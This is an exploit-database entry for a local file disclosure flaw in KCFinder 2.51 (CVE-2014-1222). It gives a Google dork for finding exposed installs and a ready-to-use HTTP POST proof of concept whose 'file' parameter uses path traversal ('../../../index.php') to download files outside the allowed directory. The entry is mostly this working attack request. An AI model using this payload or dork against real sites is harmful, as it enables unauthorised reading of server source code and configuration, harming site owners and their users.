KCFinder 2.51 - Local File Disclosure

Author: DaOne
type: webapps
platform: php
port: 
date_added: 2013-08-15  
date_updated: 2013-08-15  
verified: 0  
codes: OSVDB-96311;CVE-2014-1222  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comkcfinder-2.51.tar.gz  

raw file: 27597.txt  

---------------------------------------------------
# Exploit Title: KCFinder Local File Disclosure
# Author: DaOne
# Vendor Homepage: http://kcfinder.sunhater.com/
# Category: webapps/php
# Version: 2.51 + old versions
# Google dork: inurl:kcfinder/browse.php
---------------------------------------------------

[#] Tested on their own demo...

-PoC-
POST http://server/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1
Host: server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

dir=images/Photos+from+Bulgaria&file=../../../index.php